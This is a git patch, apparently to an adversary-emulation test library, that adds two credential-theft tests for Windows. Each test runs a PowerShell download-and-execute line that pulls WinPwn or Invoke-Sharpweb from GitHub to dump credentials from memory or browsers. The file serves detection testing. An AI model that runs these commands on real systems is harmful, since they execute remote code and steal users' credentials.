From 73f3c752a4fc9a9749d9be00ec06ca1d11aa5d0b Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Thu, 12 May 2022 20:56:38 -0500 Subject: [PATCH] Update T1555.003.yaml (#1949) * Update T1555.003.yaml Loot local Credentials - Invoke-WCMDump technique via function of WinPwn * Update T1555.003.yaml added mimi-kittenz for extracting juicy info from memory and Sharpweb gathering Browser Credentials * Update T1555.003.yaml update Co-authored-by: Carrie Roberts --- atomics/T1555.003/T1555.003.yaml | 21 ++++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index a455107a..e663f5ef 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -348,4 +348,23 @@ atomic_tests: browserpwn -consoleoutput -noninteractive cleanup_command: |- rm .\System.Data.SQLite.dll -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell +- name: WinPwn - Loot local Credentials - mimi-kittenz + description: Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s + supported_platforms: + - windows + executor: + command: |- + $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') + kittenz -consoleoutput -noninteractive + name: powershell +- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials + description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn + supported_platforms: + - windows + executor: + command: |- + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1') + Invoke-Sharpweb -command "all" + name: powershell